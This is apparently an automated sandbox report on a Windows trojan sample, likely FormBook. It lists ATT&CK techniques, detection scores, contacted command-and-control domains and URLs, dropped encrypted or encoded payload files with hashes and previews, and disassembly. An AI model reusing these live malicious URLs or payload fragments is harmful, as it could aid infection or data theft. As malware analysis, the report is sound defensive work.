Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	351 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
smQoKNkwB7.exe	62%	Virustotal		Browse
smQoKNkwB7.exe	74%	ReversingLabs	Win32.Trojan.AutoitInject
smQoKNkwB7.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.cloijz.info/r4db/	100%	Avira URL Cloud	phishing
http://www.wuyyv4tq.top/30sl/?JDE4I=Cr640F7p&jT=Y8m72M9itisBKHCuJygfmdA87gCGNftSw12cMpbnF1u6Xw97jV7YOpeEW7zuXiNJMD7NgZYDN5Q2P1YDh66t6OiemU0Jj6NmSlmlnFqeO8K+H2svpJMc7ylVJl401FrjRLqc2Lo=	0%	Avira URL Cloud	safe
http://www.cloijz.info/r4db/?jT=FQ/RR5Jd24eUARJyGPuMKqZXezSzu6XwjK+Oq7ZF4qPw6Wtsm8nU8fJ2hbzCFTyWuYbuF1JB0V7UBnva6FDpDFZu5ThYyaNjoqhPdko0IWZZd4mabolfnI5igKK/UEridKP27nc=&JDE4I=Cr640F7p	100%	Avira URL Cloud	phishing
http://www.grimbo.boats/ej4l/?jT=TviM9A7gHy1aV0uzN+xbmzzcXhhU0op9aqme4YAfufO2xJ6qsqEsFloERXhIecS+xM6WSeF6JnXzi9yaG/Cy6FB65DdAh+xVUrF/YXRKiZhV1QAbsSFCcmJpeQFsCmEmOOsC+Ls=&JDE4I=Cr640F7p	0%	Avira URL Cloud	safe
http://www.grimbo.boats/ej4l/	0%	Avira URL Cloud	safe
http://www.xinchaocjcela.net/uw0r/	100%	Avira URL Cloud	malware
http://www.xinchaocjcela.net/uw0r/?jT=nPEICG3NmX6YdDAbYweJ2KwuWMLPhUb+/mQ5fssM2K6c4DyCydhY6SRwuUq/IGDqoRtq++LuhfQJ86PpNRqRIe6Bu//QfNw4XL/wkkPE7ytB3vyYAJMpbOGuBxSCYjIrp4GMsFs=&JDE4I=Cr640F7p	100%	Avira URL Cloud	malware
http://www.grimbo.boats	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.xinchaocjcela.net	18.143.155.63	true	false	unknown
www.grimbo.boats	104.21.18.171	true	false	high
www.cloijz.info	47.83.1.90	true	false	unknown
www.wuyyv4tq.top	156.226.63.13	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.cloijz.info/r4db/	false	Avira URL Cloud: phishing	unknown
http://www.grimbo.boats/ej4l/?jT=TviM9A7gHy1aV0uzN+xbmzzcXhhU0op9aqme4YAfufO2xJ6qsqEsFloERXhIecS+xM6WSeF6JnXzi9yaG/Cy6FB65DdAh+xVUrF/YXRKiZhV1QAbsSFCcmJpeQFsCmEmOOsC+Ls=&JDE4I=Cr640F7p	false	Avira URL Cloud: safe	unknown
http://www.xinchaocjcela.net/uw0r/	false	Avira URL Cloud: malware	unknown
http://www.wuyyv4tq.top/30sl/?JDE4I=Cr640F7p&jT=Y8m72M9itisBKHCuJygfmdA87gCGNftSw12cMpbnF1u6Xw97jV7YOpeEW7zuXiNJMD7NgZYDN5Q2P1YDh66t6OiemU0Jj6NmSlmlnFqeO8K+H2svpJMc7ylVJl401FrjRLqc2Lo=	false	Avira URL Cloud: safe	unknown
http://www.grimbo.boats/ej4l/	false	Avira URL Cloud: safe	unknown
http://www.xinchaocjcela.net/uw0r/?jT=nPEICG3NmX6YdDAbYweJ2KwuWMLPhUb+/mQ5fssM2K6c4DyCydhY6SRwuUq/IGDqoRtq++LuhfQJ86PpNRqRIe6Bu//QfNw4XL/wkkPE7ytB3vyYAJMpbOGuBxSCYjIrp4GMsFs=&JDE4I=Cr640F7p	false	Avira URL Cloud: malware	unknown
http://www.cloijz.info/r4db/?jT=FQ/RR5Jd24eUARJyGPuMKqZXezSzu6XwjK+Oq7ZF4qPw6Wtsm8nU8fJ2hbzCFTyWuYbuF1JB0V7UBnva6FDpDFZu5ThYyaNjoqhPdko0IWZZd4mabolfnI5igKK/UEridKP27nc=&JDE4I=Cr640F7p	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	mtstocom.exe, 00000008.00000002.3571695887.000000000834E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.grimbo.boats	wjIagcdbKdk.exe, 00000007.00000002.3580689111.0000000009636000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.18.171	www.grimbo.boats	United States	13335	CLOUDFLARENETUS	false
47.83.1.90	www.cloijz.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
18.143.155.63	www.xinchaocjcela.net	United States	16509	AMAZON-02US	false
156.226.63.13	www.wuyyv4tq.top	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587790
Start date and time:	2025-01-10 17:59:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	smQoKNkwB7.exe renamed because original name is a hash value
Original Sample Name:	7d63d03d52fd10653117f9572caa8e1d701b1e781354e1ea301df00a9d593bc4.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 55 Number of non-executed functions: 289
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
12:02:24	API Interceptor	198092x Sleep call for process: mtstocom.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.18.171	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/kxtt/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/kxtt/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.grimbo.boats/kxtt/
	SecuriteInfo.com.Variant.Tedy.130342.18814.exe	Get hash	malicious	FormBook	Browse	www.fuugiti.xyz/aet3/?l48p=ETTjY0N9an1X8aIG5qXNacvciRNZbdUKCcrOLt6RrRurIWhPmRExX4B7f0/al7kq5FJE&vHn=5j90bfXx9vsx
47.83.1.90	1162-201.exe	Get hash	malicious	FormBook	Browse	www.ripbgs.info/hf4a/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.givvjn.info/nkmx/
	ORDER REF 47896798 PSMCO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.cruycq.info/6jon/
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	www.cruycq.info/mywm/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.adadev.info/ctdy/
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.adadev.info/ctdy/
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.cruycq.info/lf6y/
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	www.gayhxi.info/jfb9/
18.143.155.63	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	www.xinchaocjcela.net/bpfk/
	Z4KBs1USsJ.exe	Get hash	malicious	Unknown	Browse	pleasantinstead.net/index.php
	YiqjcLlhew.exe	Get hash	malicious	Unknown	Browse	pleasantinstead.net/index.php
	Z4KBs1USsJ.exe	Get hash	malicious	Unknown	Browse	returnbottle.net/index.php
	8CO4P3HwDt.exe	Get hash	malicious	Unknown	Browse	pleasantinstead.net/index.php
	YiqjcLlhew.exe	Get hash	malicious	Unknown	Browse	returnbottle.net/index.php
	66HKNPT1fl.exe	Get hash	malicious	Unknown	Browse	pleasantinstead.net/index.php
	8CO4P3HwDt.exe	Get hash	malicious	Unknown	Browse	returnbottle.net/index.php
	nnzZhhVIqM.exe	Get hash	malicious	Unknown	Browse	returnbottle.net/index.php
	66HKNPT1fl.exe	Get hash	malicious	Unknown	Browse	returnbottle.net/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.grimbo.boats	PO_62401394_MITech_20250601.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	104.21.18.171
	inv#12180.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
	CJE003889.exe	Get hash	malicious	FormBook	Browse	172.67.182.198
www.cloijz.info	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
www.xinchaocjcela.net	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	18.143.155.63
www.wuyyv4tq.top	qlG7x91YXH.exe	Get hash	malicious	FormBook	Browse	156.226.63.13
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	156.226.63.13
	CJE003889.exe	Get hash	malicious	FormBook	Browse	156.226.63.13

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://www.shinsengumiusa.com/mrloskie	Get hash	malicious	Unknown	Browse	104.16.79.73
	qlG7x91YXH.exe	Get hash	malicious	FormBook	Browse	104.21.80.1
	44742054371077666.js	Get hash	malicious	Strela Downloader	Browse	172.64.41.3
	http://atozpdfbooks.com	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://infarmbureau.com	Get hash	malicious	Unknown	Browse	104.16.40.28
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
AMAZON-02US	https://www.shinsengumiusa.com/mrloskie	Get hash	malicious	Unknown	Browse	3.120.85.61
	http://infarmbureau.com	Get hash	malicious	Unknown	Browse	3.131.211.191
	https://cjerichmond.jimdosite.com/	Get hash	malicious	Unknown	Browse	3.255.10.234
	Setup.exe	Get hash	malicious	Unknown	Browse	13.32.99.65
	https://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3f	Get hash	malicious	HTMLPhisher	Browse	44.239.30.202
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	18.141.10.107
	TU0kiz3mxz.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://booking.extrantelabelason.com/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	18.245.31.49
	https://samantacatering.com/	Get hash	malicious	Unknown	Browse	99.86.4.125
	https://www.filemail.com/d/rxythqchkhluipl?skipreg=true	Get hash	malicious	Unknown	Browse	18.245.46.20
VODANETInternationalIP-BackboneofVodafoneDE	1162-201.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	5.elf	Get hash	malicious	Unknown	Browse	88.79.50.180
	6.elf	Get hash	malicious	Unknown	Browse	178.10.231.77
	armv4l.elf	Get hash	malicious	Unknown	Browse	88.68.235.154
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	188.101.106.73
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	188.97.99.47
	Fantazy.mpsl.elf	Get hash	malicious	Unknown	Browse	188.110.169.89
	sora.m68k.elf	Get hash	malicious	Unknown	Browse	2.205.253.121
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	47.83.1.90

Process:	C:\Windows\SysWOW64\mtstocom.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut4A8A.tmp

Download File

Process:	C:\Users\user\Desktop\smQoKNkwB7.exe
File Type:	data
Category:	dropped
Size (bytes):	14990
Entropy (8bit):	7.583067453402609
Encrypted:	false
SSDEEP:	384:M9/REhXRzReZsxLOxg8l71kklHEY/Foe2Y3UgGCeMYG:MRsEOOHzH/FoeD3req
MD5:	333769DE82B1601FBD849924CCA82EF2
SHA1:	21B7772CCDC812128341A9C69EB0D6DEEC3AF546
SHA-256:	83F7C3E60FBE681B3EB28F3CF054EFC0030B01928EDD898D42FA555987137D8B
SHA-512:	01B837F70286409F7B0D3A58DDDD1359A9BEE5A68D622813939D0A6C03A158234F86A18878D884F7A0BF99E45749553D18310FA4B7B2AA36B23764B4C47896EA
Malicious:	false
Reputation:	low
Preview:	EA06.....Zo.........SP.n......5e...`.....\|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....\|.0...&d.....Hz..a....l?..uo.....P......V0....j......\|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8\|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...\|...<..aw.].3c..H.@B?...G..1...' ....k\|.A.O..#.....}V`....#..H\|.P!..d....0z....Y..>K..G./....G.7c.H..b....W..1....?.01..b.!...@.?..o.F\|....p9......S.!..nb.!....zb0..

C:\Users\user\AppData\Local\Temp\aut4DA8.tmp

Download File

Process:	C:\Users\user\Desktop\smQoKNkwB7.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.992226106445297
Encrypted:	true
SSDEEP:	6144:ORRooHZujGjkCnUE1Rd+HXToFqbkHMtFw7f4jaSrRbxwnPS:OrooHZuKjBRd+D+qbkBf4GS0nPS
MD5:	B404A2F9F7623DFCF2CCF1C361B87144
SHA1:	2C0A1592575A5DAF8A771938199512869ECD3C02
SHA-256:	379AF2DF59CD66DD569EB5B0F2EC9F9100B6F055649BE09D3C6B32AE4CB4EA26
SHA-512:	0EF2EDF5EE4601FA4529B3B6F183A363F0CBCB12DB84C2B76903B45322A9B6FF7DEB68AE94FF86858B7A37D4192D95D4FCF5B472ACA23D6FFE10A33330220EBC
Malicious:	false
Reputation:	low
Preview:	...ONK42P3HE.MK.2T3HE3O.K42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3.E3OCT.<T.A...L....[!6.??$S@5^h&R!#$@.6Vh7F!m"Z..\|.e^ )..?Y9lE3OMK42-2A../..R3.u%T.W..nS/.)...R3.R.q+S..Z+-./.42T3HE3O..42.2IE..h.42T3HE3O.K63_2CE3.IK42T3HE3O._42T#HE3?IK42.3HU3OMI42R3HE3OMK22T3HE3OM;02T1HE3OMK62..HE#OM[42T3XE3_MK42T3XE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE.;(3@2T3..7OM[42TgLE3_MK42T3HE3OMK42t3H%3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3

C:\Users\user\AppData\Local\Temp\chordates

Download File

Process:	C:\Users\user\Desktop\smQoKNkwB7.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.992226106445297
Encrypted:	true
SSDEEP:	6144:ORRooHZujGjkCnUE1Rd+HXToFqbkHMtFw7f4jaSrRbxwnPS:OrooHZuKjBRd+D+qbkBf4GS0nPS
MD5:	B404A2F9F7623DFCF2CCF1C361B87144
SHA1:	2C0A1592575A5DAF8A771938199512869ECD3C02
SHA-256:	379AF2DF59CD66DD569EB5B0F2EC9F9100B6F055649BE09D3C6B32AE4CB4EA26
SHA-512:	0EF2EDF5EE4601FA4529B3B6F183A363F0CBCB12DB84C2B76903B45322A9B6FF7DEB68AE94FF86858B7A37D4192D95D4FCF5B472ACA23D6FFE10A33330220EBC
Malicious:	false
Reputation:	low
Preview:	...ONK42P3HE.MK.2T3HE3O.K42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3.E3OCT.<T.A...L....[!6.??$S@5^h&R!#$@.6Vh7F!m"Z..\|.e^ )..?Y9lE3OMK42-2A../..R3.u%T.W..nS/.)...R3.R.q+S..Z+-./.42T3HE3O..42.2IE..h.42T3HE3O.K63_2CE3.IK42T3HE3O._42T#HE3?IK42.3HU3OMI42R3HE3OMK22T3HE3OM;02T1HE3OMK62..HE#OM[42T3XE3_MK42T3XE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE.;(3@2T3..7OM[42TgLE3_MK42T3HE3OMK42t3H%3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3HE3OMK42T3

C:\Users\user\AppData\Local\Temp\ectosphere

Download File

Process:	C:\Users\user\Desktop\smQoKNkwB7.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	172054
Entropy (8bit):	3.180608196646716
Encrypted:	false
SSDEEP:	48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fH:iaNlrHNILsaDfrQ7O4AjCkR1avfklX
MD5:	95B841AB4F07696A6FB52F63C3116E31
SHA1:	C94F5BB43A2F0289AF663D831E105F1CA281E752
SHA-256:	E89194070246C0661855ED516B1C5D9CC09E9049904D936A0EF7C92FAF7428C4
SHA-512:	332711741314D8903BC1C16B45EC62ADE217AFEE09A144525E886C95651B3EB554E914B785FD67BC618A56DF9BCAAF662F554341FDC2BA20162F7641AFA85004
Malicious:	false
Preview:	hixjs0hixjsxhixjs5hixjs5hixjs8hixjsbhixjsehixjschixjs8hixjs1hixjsehixjschixjschixjschixjs0hixjs2hixjs0hixjs0hixjs0hixjs0hixjs5hixjs6hixjs5hixjs7hixjsbhixjs8hixjs6hixjsbhixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjs4hixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjs6hixjsbhixjsahixjs7hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjs8hixjsbhixjs8hixjs6hixjsehixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjsahixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjschixjsbhixjsahixjs6hixjschixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjsehixjsbhixjs8hixjs3hixjs3hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs9hixjs0hixjsbhixjs9hixjs3hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixj

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.127747679123227
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	smQoKNkwB7.exe
File size:	1'244'160 bytes
MD5:	5fc85a215cae58fe521c9f12f5169a99
SHA1:	b8fec2bb17698e5a04a11e9f325e4eaf761a084d
SHA256:	7d63d03d52fd10653117f9572caa8e1d701b1e781354e1ea301df00a9d593bc4
SHA512:	800f63fe5215c78d45db52040a6d3e34ae02e0037ce2027aa56a077127db73fbea6b89dd1fff740435d861518fe9ad92fc891ad6163bf2ca4d59ab9a1ad1c6d4
SSDEEP:	24576:ZqDEvCTbMWu7rQYlBQcBiT6rprG8aNLVP2wOjLMaX69D:ZTvC/MTQYxsWR7aNLh0J4
TLSH:	E045CF027381C062FF9B92334B5AF6515BBD79260123E62F13A81D7ABD701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6768A042 [Sun Dec 22 23:26:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F8C950C1D03h
jmp 00007F8C950C160Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8C950C17EDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F8C950C17BAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
